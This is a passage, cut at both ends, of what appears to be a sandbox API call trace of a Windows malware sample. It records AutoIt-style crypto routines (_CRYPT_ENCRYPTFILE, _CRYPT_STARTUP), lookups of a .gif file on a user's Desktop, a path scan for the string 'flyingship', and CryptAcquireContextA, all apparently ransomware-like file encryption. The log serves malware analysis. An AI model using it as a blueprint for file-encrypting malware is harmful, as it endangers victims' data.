hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0164.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.542] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0164.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0164.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0164.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0164.542] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0164.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0164.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0164.542] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0164.542] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0164.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0164.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.542] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0164.542] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0164.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0164.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0164.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0164.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0164.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0164.543] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0164.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0164.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0164.543] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.543] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.543] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da0eaa0, ftCreationTime.dwHighDateTime=0x1d5d9bd, ftLastAccessTime.dwLowDateTime=0x47dd5440, ftLastAccessTime.dwHighDateTime=0x1d5e458, ftLastWriteTime.dwLowDateTime=0x47dd5440, ftLastWriteTime.dwHighDateTime=0x1d5e458, nFileSizeHigh=0x0, nFileSizeLow=0x8a16, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="JLQ6tYmOaaqJ7B5t.gif", cAlternateFileName="JLQ6TY~1.GIF")) returned 0x90add8 [0164.544] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0164.544] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.544] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da0eaa0, ftCreationTime.dwHighDateTime=0x1d5d9bd, ftLastAccessTime.dwLowDateTime=0x47dd5440, ftLastAccessTime.dwHighDateTime=0x1d5e458, ftLastWriteTime.dwLowDateTime=0x47dd5440, ftLastWriteTime.dwHighDateTime=0x1d5e458, nFileSizeHigh=0x0, nFileSizeLow=0x8a16, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="JLQ6tYmOaaqJ7B5t.gif", cAlternateFileName="JLQ6TY~1.GIF")) returned 0x90add8 [0164.545] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0164.545] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="valtBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="altBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tBR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BR8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VLK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LK\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JLQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LQ6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tYmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YmOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mOaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OaaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aaqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aqJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qJ7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J7B5t.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.547] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.547] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0164.547] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0164.547] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0164.547] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.547] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.547] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.547] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.548] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.548] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da0eaa0, ftCreationTime.dwHighDateTime=0x1d5d9bd, ftLastAccessTime.dwLowDateTime=0x47dd5440, ftLastAccessTime.dwHighDateTime=0x1d5e458, ftLastWriteTime.dwLowDateTime=0x47dd5440, ftLastWriteTime.dwHighDateTime=0x1d5e458, nFileSizeHigh=0x0, nFileSizeLow=0x8a16, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="JLQ6tYmOaaqJ7B5t.gif", cAlternateFileName="JLQ6TY~1.GIF")) returned 0x90af58 [0164.548] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0164.548] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.548] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0164.548] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.548] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0164.548] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.548] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0164.548] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.548] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.548] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0164.548] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.548] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.549] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.549] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.549] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.549] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0164.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.549] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0164.550] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.550] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 